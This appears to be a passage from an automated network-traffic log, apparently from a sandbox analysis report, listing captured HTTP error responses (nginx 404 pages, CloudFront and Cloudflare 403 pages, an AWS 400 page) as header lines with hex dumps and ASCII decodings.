45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 74 67 46 34 43 71 73 63 32 61 43 31 31 34 4d 4a 6a 4a 65 6e 69 46 55 76 63 36 78 57 33 75 53 71 55 66 73 47 63 74 46 34 5f 72 35 6e 46 4c 43 68 64 63 64 76 75 51 3d 3d 0a 3c 2f 50 52 45 3e 0a 3
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:08:35 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 21 Mar 2022 19:08:41 GMTContent-Type: text/htmlContent-Length: 915Connection: keep-aliveX-Cache: Error from cloudfrontVia: 1.1 b44f106cb108901846bfcc9a6508c900.cloudfront.net (CloudFront)X-Amz-Cf-Pop: HEL50-C1X-Amz-Cf-Id: haU8jONpe7PiOLlGqQDlIJU6LIWLY_Nk4JotRrHzG5AsK4kYQG4-_Q==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 68 61 55 38 6a 4f 4e 70 65 37 50 69 4f 4c 6c 47 71 51 44 6c 49 4a 55 36 4c 49 57 4c 59 5f 4e 6b 34 4a 6f 74 52 72 48 7a 47 35 41 73 4b 34 6b 59 51 47 34 2d 5f 51 3d 3d 0a 3c 2f 50 52 45 3e 0a 3
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Mon, 21 Mar 2022 19:08:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveData Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>0
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflare-nginxDate: Mon, 21 Mar 2022 19:08:44 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Mon, 21 Mar 2022 19:08:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveData Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Mar 2022 19:08:06 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 22 Mar 2022 03:08:47 GMTContent-Type: text/htmlContent-Length: 566Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.12.2Date: Mon, 21 Mar 2022 19:08:47 GMTContent-Type: text/htmlContent-Length: 3650Connection: keep-aliveETag: "5a9e5ebd-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 21 Mar 2022 19:08:47 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: AWSDate: Mon, 21 Mar 2022 19:08:52 GMTContent-Type: text/htmlContent-Length: 389Connection: keep-aliveETag: "620f202c-185"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e e9 94 99 e8 af af e8 af b7 e6 b1 82 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 2a 2a e6 9c aa e7 bb 91 e5 ae 9a e5 9f 9f e5 90 8d 2a 2a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 2a 2a e6 9c aa e7 bb 91 e5 ae 9a e5 9f 9f e5 90 8d 2a 2a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 2a 2a e6 9c aa e7 bb 91 e5 ae 9a e5 9f 9f e5 90 8d 2a 2a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 2a 2a e6 9c aa e7 bb 91 e5 ae 9a e5 9f 9f e5 90 8d 2a 2a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 2a 2a e6 9c aa e7 bb 91 e5 ae 9a e5 9f 9f e5 90 8d 2a 2a 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>400 Bad Request</title></head><body><center><h1></h1></center><hr><center>****</center><hr><center>****</center><hr><center>****</center><hr><center>****</center><hr><center>****</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.4.6 (Ubuntu)Date: Mon, 21 Mar 2022 19:08:55 GMTContent-Type: text/html; charset=utf-8Content-Length: 177Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 34 2e 36 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.4.6 (Ubuntu)</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:08:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:08:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Mar 2022 19:08:57 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveServer: JDLIVECDNData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
